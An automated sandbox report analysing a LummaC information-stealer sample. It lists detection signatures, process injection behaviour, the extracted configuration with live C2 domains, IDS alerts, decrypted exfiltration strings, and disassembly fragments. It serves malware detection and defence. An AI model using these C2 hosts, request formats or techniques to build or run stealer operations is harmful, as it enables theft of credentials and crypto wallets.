Edit tour

Windows Analysis Report
SoftWare(1).exe

Overview

General Information

Sample name:	SoftWare(1).exe
Analysis ID:	1532889
MD5:	3adc9c7905f10b8c2c0b0bb7826b67a2
SHA1:	e7861a02d2beac0caa3c00eb11a1b84fb54437db
SHA256:	60035aa91fc8436120e0d471f046a14fd45191f5ad56bef0bb3c7688c8f0d1ad
Tags:	exeuser-4k95m
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SoftWare(1).exe (PID: 3652 cmdline: "C:\Users\user\Desktop\SoftWare(1).exe" MD5: 3ADC9C7905F10B8C2C0B0BB7826B67A2)

conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 4080 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["enlargkiw.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "vennurviot.sbs", "condifendteu.sbs", "resinedyw.sbs", "passimovrt.cfd", "mathcucom.sbs"], "Build id": "HpOoIh--@XXXXrty052"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:01.951403+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.28.222	443	TCP
2024-10-14T05:01:02.976284+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	443	TCP
2024-10-14T05:01:03.964120+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49732	172.67.152.13	443	TCP
2024-10-14T05:01:04.881092+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49733	172.67.205.156	443	TCP
2024-10-14T05:01:06.007757+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49734	104.21.46.170	443	TCP
2024-10-14T05:01:06.978810+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49735	104.21.30.221	443	TCP
2024-10-14T05:01:07.883701+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49736	172.67.141.136	443	TCP
2024-10-14T05:01:08.867229+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49737	188.114.96.3	443	TCP
2024-10-14T05:01:11.254161+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49739	104.21.53.8	443	TCP
2024-10-14T05:01:12.869564+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49740	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:01.951403+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.28.222	443	TCP
2024-10-14T05:01:02.976284+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	443	TCP
2024-10-14T05:01:03.964120+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49732	172.67.152.13	443	TCP
2024-10-14T05:01:04.881092+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49733	172.67.205.156	443	TCP
2024-10-14T05:01:06.007757+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49734	104.21.46.170	443	TCP
2024-10-14T05:01:06.978810+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49735	104.21.30.221	443	TCP
2024-10-14T05:01:07.883701+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49736	172.67.141.136	443	TCP
2024-10-14T05:01:08.867229+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49737	188.114.96.3	443	TCP
2024-10-14T05:01:11.254161+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49739	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:12.869564+0200	2049812	1	A Network Trojan was detected	192.168.2.4	49740	104.21.53.8	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:07.481620+0200	2056559	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	172.67.141.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:08.433757+0200	2056557	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:06.541867+0200	2056561	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.30.221	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:03.524458+0200	2056567	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	172.67.152.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:02.495251+0200	2056571	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:04.472053+0200	2056565	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	172.67.205.156	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:05.552086+0200	2056563	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.46.170	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:02.992424+0200	2056568	1	Domain Observed Used for C2 Detected	192.168.2.4	51466	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:06.988332+0200	2056558	1	Domain Observed Used for C2 Detected	192.168.2.4	55368	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:07.888189+0200	2056556	1	Domain Observed Used for C2 Detected	192.168.2.4	49533	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:06.027035+0200	2056560	1	Domain Observed Used for C2 Detected	192.168.2.4	51139	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:03.030095+0200	2056566	1	Domain Observed Used for C2 Detected	192.168.2.4	61779	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:01.983945+0200	2056570	1	Domain Observed Used for C2 Detected	192.168.2.4	58982	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:03.965677+0200	2056564	1	Domain Observed Used for C2 Detected	192.168.2.4	63820	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:04.964186+0200	2056562	1	Domain Observed Used for C2 Detected	192.168.2.4	60410	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T05:01:10.165473+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SoftWare(1).exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.SoftWare(1).exe.6cf74000.5.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["enlargkiw.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "vennurviot.sbs", "condifendteu.sbs", "resinedyw.sbs", "passimovrt.cfd", "mathcucom.sbs"], "Build id": "HpOoIh--@XXXXrty052"}

Multi AV Scanner detection for domain / URL

Source: condifendteu.sbs	Virustotal: Detection: 17%	Perma Link
Source: vennurviot.sbs	Virustotal: Detection: 17%	Perma Link
Source: drawwyobstacw.sbs	Virustotal: Detection: 17%	Perma Link
Source: mathcucom.sbs	Virustotal: Detection: 20%	Perma Link
Source: sergei-esenin.com	Virustotal: Detection: 17%	Perma Link
Source: resinedyw.sbs	Virustotal: Detection: 17%	Perma Link
Source: enlargkiw.sbs	Virustotal: Detection: 17%	Perma Link
Source: ehticsprocw.sbs	Virustotal: Detection: 15%	Perma Link
Source: allocatinow.sbs	Virustotal: Detection: 19%	Perma Link
Source: https://mathcucom.sbs/g	Virustotal: Detection: 18%	Perma Link
Source: enlargkiw.sbs	Virustotal: Detection: 17%	Perma Link
Source: drawwyobstacw.sbs	Virustotal: Detection: 17%	Perma Link
Source: https://vennurviot.sbs/	Virustotal: Detection: 17%	Perma Link
Source: mathcucom.sbs	Virustotal: Detection: 20%	Perma Link
Source: ehticsprocw.sbs	Virustotal: Detection: 15%	Perma Link
Source: allocatinow.sbs	Virustotal: Detection: 19%	Perma Link
Source: https://mathcucom.sbs/	Virustotal: Detection: 20%	Perma Link
Source: condifendteu.sbs	Virustotal: Detection: 17%	Perma Link
Source: https://drawwyobstacw.sbs/api	Virustotal: Detection: 17%	Perma Link
Source: https://allocatinow.sbs/api	Virustotal: Detection: 19%	Perma Link
Source: https://vennurviot.sbs/api	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for submitted file

Source: SoftWare(1).exe	ReversingLabs: Detection: 21%
Source: SoftWare(1).exe	Virustotal: Detection: 32%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\msvcp110.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SoftWare(1).exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: drawwyobstacw.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: condifendteu.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: ehticsprocw.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: vennurviot.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: resinedyw.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: enlargkiw.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: allocatinow.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: mathcucom.sbs
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: passimovrt.cfd
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmp	String decryptor: HpOoIh--@XXXXrty052

Source: SoftWare(1).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.28.222:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.46.170:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: SoftWare(1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF6556D FindFirstFileExW,

0_2_6CF6556D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then lea eax, dword ptr [esp+70h]	2_2_0058A429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push ebx	2_2_0058A429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	2_2_0059162C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-48088AD6h]	2_2_00590730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3402AD93h]	2_2_005909FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 27BAF212h	2_2_005909FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 4E7D7006h	2_2_00590A8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], C274D4CAh	2_2_00590DDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-62528225h]	2_2_0055CE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax], bl	2_2_00561048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	2_2_00574030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0057E030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, ebx	2_2_0058A0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	2_2_00593090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [0059EA1Ch], esi	2_2_0055E104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx]	2_2_005921C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push 754C8FBDh	2_2_0055E259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_00594220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax+ebx], 00000030h	2_2_005512D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0055D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [esp]	2_2_00579467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	2_2_00593430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, eax	2_2_005764CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_0057C486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	2_2_0057D541
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_0058C540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+27DA70DAh]	2_2_0057B525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp-21358888h]	2_2_0055D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, esi	2_2_0055D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_0057C486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, ebx	2_2_005776D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp al, 2Eh	2_2_0057A68D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_005876A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi+3Ch]	2_2_005606AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	2_2_0057074A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0057074A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], cl	2_2_0057F776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0057F776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, ecx	2_2_0057F776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_0057872C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], dl	2_2_0057E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], cl	2_2_0057E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], cl	2_2_0057E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0057E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, ecx	2_2_0057E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	2_2_0057C811
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push ebx	2_2_0056E8F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	2_2_00555880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0055E919
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+48h]	2_2_005739D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0057DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	2_2_0057AB6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	2_2_00570B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	2_2_0058DB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00575B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+ebx-5Ah]	2_2_00592B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	2_2_00592B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	2_2_00592B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-00000093h]	2_2_00594C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	2_2_0058AC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-3EFFFBA8h]	2_2_00577CE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	2_2_00577CE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dl, 01h	2_2_00577CE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_00577CE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [eax+esi]	2_2_00556C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], C85F7986h	2_2_00580D01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	2_2_00591E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+373A3ECEh]	2_2_0056EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp di, 005Ch	2_2_0056EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_0056EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push edi	2_2_00590EE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], C85F7986h	2_2_00580E87
